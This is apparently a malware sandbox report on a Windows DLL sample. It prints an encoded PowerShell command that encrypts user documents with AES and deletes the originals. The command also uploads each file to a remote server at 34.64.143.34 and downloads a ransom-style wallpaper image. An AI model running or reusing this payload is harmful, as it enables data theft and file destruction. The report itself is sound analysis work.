Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 14, 2021, 3:35 p.m.	Sept. 14, 2021, 3:37 p.m.

Size	32.0KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`dcbcd8c4fcdd17079caa96f80be4dd04`
SHA256	`0bd512e81a4bf69155b9914b33aba5549cc61e3f5571da1810d99ceeda69b7ce`
CRC32	`5B73583E`
ssdeep	`768:lw5WvEXtn8qE2DmtylSJFEl4d/z/SbYZZRRMBe9TmzbXI20A:q5WvEdny2Dm8EJUchwzB1`
PDB Path	D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsDLL - (no description) IsPE32 - (no description)

regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Users\test22\AppData\Local\Temp\admin.php.dll
2500
- powershell.exe powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsACAAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AGAATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJwByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAUABhAHIAYQBtAHMADQAKACAAIAAgACAAewAgAA0ACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBzAGUAcgAzADIALgBkAGwAbAAiACwAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQAgAA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAewB1AHAAZABgAEEAVABFAGAASQBOAEkAZgBgAGkAbABFAH0AIAA9ACAAMAB4ADAAMQANAAoAIAAgACAAIAAkAHsAcwBlAGAATgBEAGMASABhAGAATgBHAGUARQB2AGAAZQBgAE4AVAB9ACAAPQAgADAAeAAwADIADQAKACAAIAAgACAADQAKACAAIAAgACAAJAB7AGYAdwBgAGkATgBJAGAATgBJAH0AIAA9ACAAJAB7AFUAUABkAGEAYABUAEUAaQBgAE4AYABJAGYASQBsAGUAfQAgAC0AYgBvAHIAIAAkAHsAcwBlAGAATgBEAEMAYABIAEEATgBnAGUAZQB2AGAAZQBgAE4AdAB9AA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQAewByAGAARQBUAH0AIAA9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIAAgAEIAZQBnAGkAbgAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAcwBgAGgAYABBAGAAbQBBAG4AYQBHAEUARAB9ACAAPQAgAG4ARQBXAC0AbwBgAEIAagBgAGUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADIANQA2AE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAUwBgAE0AQQBuAEEARwBgAEUARAB9ACAAPQAgAG4AZQBXAGAALQBvAGAAQgBKAEUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAcwBNAEEAbgBgAEEAZwBgAGUAZAB9AC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAYQBFAFMAbQBBAG4AYQBgAEcAYABlAEQAfQAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7AA0ACgAgACAAIAAgACAAIAAgACAAJAB7AEEAZQBgAHMAbQBgAEEAYABOAGEAZwBFAGQAfQAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAQQBFAFMAYABNAEEAYABOAEEARwBlAEQAfQAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAGUAcwBgAE0AQQBOAGAAQQBHAGAAZQBEAH0ALgBLAGUAeQAgAD0AIAAkAHsAcwBoAGEATQBgAEEAbgBgAEEAYABHAEUARAB9AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAewBrAGAAZQBZAH0AKQApADsADQAKACAAIAAgACAAIAAgACAAIAB0AHIAeQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBmAGAAaQBMAGUAfQAgAD0AIABnAEUAdAAtAGAASQBgAFQARQBNACAALQBQAGEAdABoACAAJAB7AHAAYQBgAFQAaAB9ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAUABMAGEAaQBgAE4AQgBgAHkAYABUAGUAUwB9ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJAB7AEYASQBgAGwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AG8AdQBgAFQAUABgAEEAVABoAH0AIAA9ACAAJAB7AGYASQBgAEwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACgAJwAuAGUAJwArACcAbgBjAHIAeQBjAHIAeQAnACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AGUAbgBjAHIAYAB5AFAAdABgAG8AcgB9ACAAPQAgACQAewBBAEUAcwBgAE0AQQBuAEEAYABHAEUAZAB9AC4AQwByAGUAYQB0AGUARQBuAGMAcgB5AHAAdABvAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBlAG4AYABjAFIAWQBwAFQARQBgAGQAQgBgAFkAVABlAFMAfQAgAD0AIAAkAHsAZQBuAEMAcgB5AGAAcABgAFQAbwByAH0ALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAB7AFAAYABsAEEASQBOAGIAYAB5AFQAZQBzAH0ALAAgADAALAAgACQAewBQAGAAbABgAEEAaQBuAGIAWQB0AEUAUwB9AC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQBOAGAAQwBgAFIAWQBgAFAAdABlAGAARABCAHkAdABFAHMAfQAgAD0AIAAkAHsAQQBFAHMAbQBhAG4AYABBAGAARwBgAGUARAB9AC4ASQBWACAAKwAgACQAewBFAGAATgBDAFIAYABZAFAAdABlAGQAYABCAFkAdABlAHMAfQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAYQBlAGAAUwBgAG0AQQBOAGAAQQBHAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAewBvAFUAVABgAFAAYQBgAFQASAB9ACwAIAAkAHsAZQBuAGAAQwBSAFkAUABUAGUAZABCAGAAeQBUAEUAcwB9ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABnAGAARQBgAFQALQBJAHQARQBtACAAJAB7AG8AVQB0AGAAcABhAHQAaAB9ACkALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAAPQAgACQAewBGAGkAYABsAGUAfQAuAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoACcARgAnACsAJwBpAGwAZQAgACcAKwAnAGUAJwArACcAbgBjACcAKwAnAHIAeQBwAHQAZQBkACcAKwAnACAAJwArACcAdABvACcAKwAnACAAJwArACIAJABvAHUAdABQAGEAdABoACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAfQAgAEMAYQB0AGMAaAAgAHsAIAB9AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgAEUAbgBkACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBTAEgAQQBgAG0AYQBuAGEAZwBgAEUAZAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBBAGAARQBzAE0AYQBOAGAAQQBnAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJAB7AGQAbwBgAFcAbgBgAEwAbwBhAGAARABVAHIATAB9ACAAPQAgACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvADEANgAnACsAJwA4AC4AMQAnACsAJwA4ACcAKwAnADgALgAxADIANwAnACsAJwAuADIAJwArACcAMQA3ACcAKwAnAC8AbgBvACcAKwAnAHQAaQBjAGUALgBwAG4AZwAnACkADQAKACQAewBQAEEAYABUAGgAfQAgAD0AIAAoACQAewBFAE4AdgA6AGAAVABlAGAATQBwAH0AKQAgACsAIAAoACgAJwAzAEQAQgBuAG8AJwArACcAdABpAGMAZQAuACcAKwAnAHAAJwArACcAbgBnACcAKQAuAHIARQBQAEwAYQBDAGUAKAAoAFsAYwBIAEEAUgBdADUAMQArAFsAYwBIAEEAUgBdADYAOAArAFsAYwBIAEEAUgBdADYANgApACwAWwBTAFQAUgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkADQAKACgAbgBlAFcALQBvAGAAQgBqAEUAYABDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB7AEQATwBXAGAATgBMAG8AQQBkAGAAVQByAEwAfQAsACAAJAB7AFAAQQBgAFQAaAB9ACkADQAKAA0ACgBTAEUAVABgAC0AdwBhAGAAbABgAEwAUABBAHAAYABlAFIAIAAtAEkAbQBhAGcAZQAgACQAZQBuAHYAOgBUAEUATQBQACIAXABuAG8AdABpAGMAZQAuAHAAbgBnACIAIAAtAFMAdAB5AGwAZQAgAEYAaQB0AA0ACgANAAoAdwBoAGkAbABlACgAMQApACAAewANAAoAIAAgACAAIAAkAHsAQQB9ACAAPQAgAEcAZQBUAC0AYwBoAGkAbABgAGQAYABpAGAAVABlAE0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAC8AKgAgAC0ASQBuAGMAbAB1AGQAZQAgACoALgBwAG4AZwAsACAAKgAuAGcAaQBmACwAIAAqAC4AagBwAGcALAAgACoALgBqAHAAZQBnACwAIAAqAC4AYQBpACwAIAAqAC4AcABzAGQALAAgACoALgBjAHMAdgAsACAAKgAuAHgAbABzAHgALAAgACoALgBwAHAAdAB4ACwAIAAqAC4AcABkAGYALAAgACoALgBoAHcAcAAsACAAKgAuAGgAdwBwAHgALAAgACoALgB0AHgAdAAsACAAKgAuAGIAYQB0ACwAIAAqAC4AbABuAGsALAAgACoALgB6AGkAcAAsACAAKgAuADcAegAsACAAKgAuAHIAYQByACwAIAAqAC4AdAB4AHQAIAAtAFIAZQBjAHUAcgBzAGUAOwANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHsAQgB9ACAAaQBuACAAJAB7AEEAfQApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AFcAYwB9ACAAPQAgAE4AZQBgAFcALQBvAGAAQgBKAGAARQBDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AHIAYABlAFMAfQAgAD0AIAAkAHsAVwBDAH0ALgBVAHAAbABvAGEAZABGAGkAbABlACgAKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AMwA0ACcAKwAnAC4ANgAnACsAJwA0AC4AJwArACcAMQA0ADMALgAzADQAOgAnACsAJwAzADAAMAAwACcAKQAsACAAJAB7AEIAfQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAYABOAGAAVgBgAE8ASwBlAGAALQBFAG4AYwByAHkAYwBSAHkAIAAtAEsAZQB5ACAAKAAnADkANgA0ADEARQA0ACcAKwAnADQAJwArACcAMAAzADUAQwAwADgAQQAxADQAJwArACcAMgAyACcAKwAnADYAOABGAEIAJwArACcARQA1AEEAQgAzADMARAAwAEQARgAnACkAIAAtAFAAYQB0AGgAIAAkAHsAQgB9ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIARQBNAG8AVgBgAEUALQBJAGAAVABlAE0AIAAkAHsAYgB9ADsADQAKACAAIAAgACAAIAAgACAAIAB9ACAAQwBhAHQAYwBoACAAewAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAFQAYQBgAFIAVABgAC0AUABgAFIAbwBjAEUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAoACcALQAnACsAJwBOAG8ARQB4AGkAdAAnACkALAAoACcALQB3AGkAbgBkAG8AJwArACcAdwBzAHQAeQBsAGUAJwArACcAIABoAGkAJwArACcAZAAnACsAJwBkACcAKwAnAGUAbgAnACkALAAoACcALQBFAG4AYwAgAEoAQQBCADAAQQBDACcAKwAnAEEAQQBQAFEAQQBnAEEAQwBjAEEAVwB3AEIARQBBAEcAdwBBAGIAQQBCAEoAQQBHADAAQQBjAEEAQgB2AEEASABJACcAKwAnAEEAZABBAEEAbwBBAEMASQBBAGQAUQBCAHoAJwArACcAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAGkAQQBDAGsAQQBYAFEAQQBnAEEASABBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBDAEEAQQBjAHcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcATQBBAEkAQQBCAGwAQQBIAGcAQQBkAEEAQgBsAEEASABJAEEAYgAnACsAJwBnAEEAZwBBAEcASQBBAGIAdwBCAHYAQQBHAHcAQQBJAEEAQgBUAEEARwBnAEEAYgB3AEIAMwBBAEYAYwBBAGEAUQBCAHUAQQBHAFEAQQBiAHcAQgAzAEEAQwBnAEEAYQBRAEIAdQBBAEgAUQBBAEkAQQBCAG8AQQBHACcAKwAnAEUAQQBiAGcAQgBrAEEARwAnACsAJwB3AEEAWgBRAEEAcwBBAEMAQQBBAGEAUQBCAHUAQQBIAFEAQQBJAEEAQgB6AEEASABRAEEAWQBRAEIAMABBAEcAVQBBAEsAUQBBADcAJwArACcAQQBDAGMAQQBEAFEAQQBLAEEARwBFAEEAWgBBAEIAawBBAEMAMABBAGQAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAYgBnAEIAaABBAEcAMAAnACsAJwBBAFoAUQBBAGcAQQBIAGMAQQBhAFEAQgB1AEEAQwBBAEEATABRAEIAdABBAEcAVQBBAGIAUQBCAGkAQQBHAFUAQQBjAGcAQQBnAEEAQwBRAEEAZABBAEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQgB6AEEASABBAEEAJwArACcAWQBRAEIAagBBAEcAVQBBAEkAQQAnACsAJwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEATgBBAEEAbwBBAFcAdwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEAdQBBAEgAYwBBAGEAUQBCAHUAQQBGADAAQQAnACsAJwBPAGcAQQA2AEEARgBNAEEAYQBBAEIAdgBBAEgAYwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEASwBBAEEAbwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIARQBBAEcAawBBAFkAUQBCAG4AQQAnACsAJwBHADQAQQBiAHcAQgB6AEEASABRACcAKwAnAEEAYQBRAEIAagBBAEgATQBBAEwAZwBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEYAMABBAE8AZwBBADYAQQBFAGMAQQBaAFEAQgAwAEEARQBNAEEAZABRAEIAeQBBAEgASQBBAFoAUQBCAHUAQQBIAFEAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAG8AQQBDAGsAQQBJAEEAQgA4AEEAQwBBAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAawBBAEwAZwBCAE4AQQBHAEUAJwArACcAQQBhAFEAQgB1AEEARgBjAEEAYQBRAEIAdQBBAEcAUQBBAGIAdwAnACsAJwBCADMAQQBFAGcAQQBZAFEAQgB1AEEARwBRAEEAYgBBAEIAbABBAEMAdwBBAEkAQQBBAHcAQQBDAGsAQQBEAFEAQQBLAEEAQQAwAEEAQwBnAEEAawBBAEcATQBBAGIAQQBCAHAAQQBHAFUAQQBiAGcAQgAnACsAJwAwAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQAnACsAJw